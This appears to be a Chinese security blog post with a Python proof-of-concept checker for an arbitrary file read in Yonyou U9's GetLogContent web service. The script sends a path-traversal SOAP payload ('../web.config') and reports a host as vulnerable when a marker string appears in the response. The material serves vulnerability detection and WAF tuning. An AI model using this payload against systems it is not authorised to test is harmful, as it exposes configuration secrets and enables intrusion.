一、背景
值守期间,产品 WAF 上出现了大量任意文件读取告警;排查后确认告警针对的是用友 U9 产品,随即有了该漏洞的验证 POC。
二、POC编写
import argparse
import requests
import sys
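# Check one base URL for the GetLogContent arbitrary file read described above.
def cmd(url):
    """Send the GetLogContent probe to ``url`` and print whether it looks vulnerable.

    The probe is a SOAP POST to ``/OnLine/UMWebService.asmx?op=GetLogContent``
    whose ``fileName`` is ``../web.config``. A response containing the string
    ``UFSoft.UBF.UI`` is reported as vulnerable. For detection work, the same
    three elements (endpoint path, ``GetLogContent`` SOAPAction, and a
    parent-directory sequence in ``fileName``) are what a WAF or log query
    should match on.

    The response body is only searched for the marker. It is never printed or
    stored, because a returned web.config may hold connection strings or other
    secrets.

    Args:
        url: Base URL of the target, with scheme (trailing slashes are ignored).

    Side effects:
        Prints the verdict to stdout. On a request failure it prints the
        original error line to stdout and the exception detail to stderr,
        then exits the process with status 1.
    """
    endpoint = "/OnLine/UMWebService.asmx?op=GetLogContent"
    # Strip trailing slashes so "http://host/" does not become "http://host//OnLine/...".
    url1 = f"{url.rstrip('/')}{endpoint}"
    # Content-Length is deliberately not set here: requests computes it from
    # the body, and the original literal value "length" was not a valid header.
    headers = {
        'Content-Type': 'text/xml; charset=utf-8',
        'SOAPAction': "http://tempuri.org/GetLogContent",
    }
    # Plain literal (no placeholders), so no f-string is needed.
    data = '''<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetLogContent xmlns="http://tempuri.org/">
<fileName>../web.config</fileName>
</GetLogContent>
</soap:Body>
</soap:Envelope>
'''
    try:
        # verify=False turns off TLS certificate validation, presumably so hosts
        # with self-signed certificates can be checked; the peer is therefore
        # not authenticated and the verdict should be treated accordingly.
        r = requests.post(url1, headers=headers, data=data, verify=False, timeout=5)
    except requests.RequestException as e:
        # Only transport/URL errors are handled here; anything else is a bug
        # in this script and should surface with a traceback.
        print(f"[-]{url}存在异常,请检查!!!")
        print(f"[-] request error: {e}", file=sys.stderr)
        sys.exit(1)

    # NOTE(review): the verdict rests on a single substring and ignores the
    # HTTP status, so an error page that happens to contain the marker would
    # be a false positive. Confirm positives manually.
    if "UFSoft.UBF.UI" in r.text:
        print(f"[*]{url1}\n存在任意文件读取漏洞")
    else:
        print(f"[-]{url1}\n不存在任意文件读取漏洞")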
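def main():
    """Print the banner, read the ``-u`` base URL from the command line and check it."""
    # Raw string: the ASCII art is full of backslashes. In a normal literal
    # they are invalid escape sequences, and the backslash that ends the last
    # art line acts as a line continuation, gluing the author line onto it.
    banner = r"""
_____ _ _____ _
| __ \ | | | __ \ | |
| | | | __ _| |_ __ _ | |__) |__ _ ___| | __
| | | |/ _` | __/ _` | | _ // _` |/ __| |/ /
| |__| | (_| | || (_| | | | \ \ (_| | (__| <
|_____/ \__,_|\__\__,_| |_| \_\__,_|\___|_|\_\
作者:添衣&吹風 地址:https://blog.csdn.net/weixin_53884648
"""
    print(banner)
    print("用友U9产品漏洞")
    parser = argparse.ArgumentParser()
    # required=True already makes argparse reject a missing -u, so a default is redundant.
    parser.add_argument("-u", dest="url", required=True, help="请输入url地址")
    args = parser.parse_args()
    cmd(args.url)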
# Run the check only when this file is executed as a script, not on import.
if __name__ == "__main__":
    main()